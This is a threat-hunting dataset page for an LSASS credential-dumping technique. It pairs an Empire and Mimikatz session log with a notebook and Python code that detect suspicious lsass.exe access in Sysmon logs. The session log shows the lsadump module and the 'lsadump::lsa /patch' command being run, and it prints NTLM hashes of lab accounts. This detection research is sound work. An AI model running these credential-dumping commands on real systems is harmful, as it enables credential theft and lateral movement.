Empire Mimikatz Lsadump LSA Patch
Metadata
Field | Value |
---|---|
Author | Roberto Rodriguez @Cyb3rWard0g |
Creation Date | 2019/05/18 |
Modification Date | 2020/09/20 |
Tactics | ['TA0006'] |
Techniques | ['T1003.001'] |
Tags | ['LSASS Memory Credentials Read'] |
Dataset Description
This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.
Datasets Downloads
Dataset Type | Link |
---|---|
Host | |
Notebooks
Notebooks created by the community leveraging the mordor datasets
Author | Name | Link |
---|---|---|
Threat Hunter Playbook | LSASS Access from Non System Account | https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html |
Adversary View
(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*
(Empire: powershell/credentials/mimikatz/lsadump) > info
Name: Invoke-Mimikatz LSA Dump
Module: powershell/credentials/mimikatz/lsadump
NeedsAdmin: True
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: True
OutputExtension: None
Authors:
@JosephBialek
@gentilkiwi
Description:
Runs PowerSploit's Invoke-Mimikatz function to extract a
particular user hash from memory. Useful on domain
controllers.
Comments:
http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt
ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls
a
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True B7Y8G4XC Agent to run module on.
Username False Username to extract the hash for, blank
for all local passwords.
(Empire: powershell/credentials/mimikatz/lsadump) > execute
[*] Tasked B7Y8G4XC to run TASK_CMD_JOB
[*] Agent B7Y8G4XC tasked with task ID 2
[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump
(Empire: powershell/credentials/mimikatz/lsadump) >
Job started: VGHXZ5
Hostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882
.#####. mimikatz 2.2.0 (x64) #19041 Aug 4 2020 20:16:54
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::lsa /patch
Domain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f4 (500)
User : wardog
LM :
NTLM : 42ddb2963bbe8f1c075fc869d3bce33e
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : 45a313f1860be24e967e55b94649aa31
(Empire: powershell/credentials/mimikatz/lsadump) >
Explore Mordor Dataset
Initialize Analytics Engine
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell |800 |2859 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103 |2505 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |279 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |162 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |150 |
|WORKSTATION5.theshire.local|Security |5156 |79 |
|MORDORDC.theshire.local |Security |4658 |64 |
|MORDORDC.theshire.local |Security |5158 |61 |
|MORDORDC.theshire.local |Security |5156 |55 |
|WORKSTATION5.theshire.local|Security |5158 |48 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |48 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |3 |38 |
|WORKSTATION6.theshire.local|Security |5156 |38 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |37 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |3 |36 |
|WORKSTATION6.theshire.local|Security |4703 |32 |
|MORDORDC.theshire.local |Security |4656 |32 |
|MORDORDC.theshire.local |Security |4663 |32 |
|MORDORDC.theshire.local |Security |4690 |32 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |10 |30 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
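A defender's next step after the channel/EventID counts above, as an added example that is not code from the Mordor project or from the Threat Hunter Playbook notebook linked earlier: it takes Sysmon Event ID 10 (ProcessAccess) rows of the kind this dataset contains and keeps only those where a process outside a small allowlist opens lsass.exe with memory-read rights, which is what reading credentials out of LSASS memory requires. The field names (SourceImage, TargetImage, GrantedAccess, CallTrace) are Sysmon's own; that the Mordor table keeps them unchanged, the allowlist, and the sample records are all assumptions. The logic runs offline over constructed records in plain Python, and the SPARK_SQL string expresses the same filter against mordorTable for use in the notebook.

```python
"""
Added detection example for Sysmon Event ID 10 (ProcessAccess) records.
Not part of the Mordor page or the linked Threat Hunter Playbook notebook.
Field names follow Sysmon's ProcessAccess schema (SourceImage, TargetImage,
GrantedAccess, CallTrace); that the Mordor table keeps those names unchanged
is an assumption.
"""

# Process access rights from winnt.h. Reading another process's memory needs
# PROCESS_VM_READ together with one of the query rights, so masks such as
# 0x1010 and 0x1410 are the ones most often seen against lsass.exe.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Constructed allowlist of images that open lsass.exe during normal operation
# on a Windows host; replace it with an allowlist built from your own baseline.
ALLOWED_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# The same filter written against the page's mordorTable view (not executed here).
SPARK_SQL = """
SELECT Hostname, SourceImage, TargetImage, GrantedAccess, CallTrace
FROM mordorTable
WHERE Channel = 'Microsoft-Windows-Sysmon/Operational'
  AND EventID = 10
  AND lower(TargetImage) LIKE '%lsass.exe'
"""


def parse_granted_access(value: str) -> int:
    """Sysmon logs GrantedAccess as a hex string such as '0x1010'."""
    return int(value, 16)


def reads_process_memory(mask: int) -> bool:
    """True when the mask grants the rights needed to read another process's memory."""
    query_bits = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION
    return bool(mask & PROCESS_VM_READ) and bool(mask & query_bits)


def is_lsass_target(event: dict) -> bool:
    """ProcessAccess event whose target image is lsass.exe (case-insensitive)."""
    target = event.get("TargetImage", "").lower()
    return event.get("EventID") == 10 and target.endswith("\\lsass.exe")


def suspicious_lsass_access(events):
    """Return the lsass.exe ProcessAccess events that merit analyst attention."""
    hits = []
    for event in events:
        if not is_lsass_target(event):
            continue
        source = event.get("SourceImage", "").lower()
        if source in ALLOWED_SOURCE_IMAGES:
            continue
        mask = parse_granted_access(event["GrantedAccess"])
        if not reads_process_memory(mask):
            continue
        hits.append({
            "Hostname": event.get("Hostname"),
            "SourceImage": event["SourceImage"],
            "GrantedAccess": hex(mask),
            # Frames Sysmon cannot map to a loaded module appear as UNKNOWN in
            # CallTrace; code loaded in memory rather than from disk often looks like this.
            "UnbackedCaller": "UNKNOWN" in event.get("CallTrace", ""),
        })
    return hits


# Constructed sample records shaped like the dataset's Sysmon Event ID 10 rows.
SAMPLE_EVENTS = [
    {"Hostname": "WORKSTATION5.theshire.local", "EventID": 10,
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|UNKNOWN(000001F2E3A40000)"},
    {"Hostname": "WORKSTATION5.theshire.local", "EventID": 10,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\csrsrv.dll+2d1a"},
    {"Hostname": "WORKSTATION5.theshire.local", "EventID": 10,
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2e0b3"},
    {"Hostname": "WORKSTATION5.theshire.local", "EventID": 10,
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|UNKNOWN(000001F2E3A40000)"},
]

if __name__ == "__main__":
    for hit in suspicious_lsass_access(SAMPLE_EVENTS):
        print(hit)
```

Only the first sample record survives: the csrss.exe open is allowlisted, the svchost.exe open lacks PROCESS_VM_READ, and the last record targets notepad.exe. Two caveats when moving this onto the real table: the set of GrantedAccess masks a given tool requests varies, so filter on the bits rather than on exact values, and the CallTrace UNKNOWN flag is a heuristic that needs tuning against your baseline. Note also that in the top-20 counts above, Security 4656/4663 object-access events only show up for MORDORDC, while WORKSTATION5 contributes 150 Sysmon EventID 10 rows, so the Sysmon channel is the one to start with on the workstation.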